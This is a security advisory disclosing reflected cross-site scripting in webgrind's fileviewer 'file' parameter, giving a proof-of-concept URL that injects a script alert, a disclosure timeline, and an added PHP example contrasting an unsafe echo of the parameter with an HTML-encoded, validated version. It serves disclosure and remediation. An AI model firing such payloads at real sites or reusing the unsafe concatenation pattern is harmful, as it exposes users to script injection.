Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is an Xdebug profiling web frontend written in PHP.

Advisory Information:
=====================================================
Webgrind is vulnerable to reflected cross-site scripting (XSS): the "file" parameter of the fileviewer operation is written back into the page without HTML encoding.

Exploit code:
==============
http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E

Disclosure Timeline:
==================================
May 19, 2015: Vendor Notification
May 20, 2015: Public Disclosure

Severity Level:
===============
Med

Description:
============
Request Method(s):
[+] GET

Vulnerable Product:
[+] Webgrind

Vulnerable Parameter(s):
[+] file=[XSS]

Affected Area(s):
[+] Current user.

==============================
(hyp3rlinx)
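The pattern behind this class of bug, and its fix, shown as an added example that is not webgrind's own code: a hypothetical fileviewer handler that reflects the "file" query parameter. The function names and the allow-list policy are assumptions for illustration.

```php
<?php
// Added illustration, not code from the webgrind project: a hypothetical
// handler for index.php?op=fileviewer&file=... that echoes the parameter.

// Vulnerable pattern: the raw parameter is concatenated into HTML, so a
// value containing markup is rendered by the browser instead of shown as text.
function renderFileHeadingUnsafe(string $file): string
{
    return '<h2>Viewing: ' . $file . '</h2>';
}

// Hardened pattern: HTML-encode at the point of output. ENT_QUOTES also
// encodes single and double quotes, so the result is safe inside attribute
// values as well as element content; ENT_SUBSTITUTE replaces invalid UTF-8
// rather than returning an empty string.
function renderFileHeadingSafe(string $file): string
{
    $escaped = htmlspecialchars($file, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Viewing: ' . $escaped . '</h2>';
}

// Defence in depth (assumed policy, tune to the deployment): a profiled file
// name is expected to be a plain path, so reject anything outside a
// conservative character set and any ".." segment before using it at all.
function isPlausibleFileName(string $file): bool
{
    return $file !== ''
        && preg_match('~^[A-Za-z0-9_./-]+$~', $file) === 1
        && strpos($file, '..') === false;
}

// Request handling: validate first, then encode on output.
$file = $_GET['file'] ?? '';
if (!isPlausibleFileName($file)) {
    http_response_code(400);
    exit('Invalid file parameter');
}
header('Content-Type: text/html; charset=UTF-8');
echo renderFileHeadingSafe($file);
```

Output encoding is the actual fix for the reflected XSS; the allow-list check only narrows what reaches the template and is not a substitute for it.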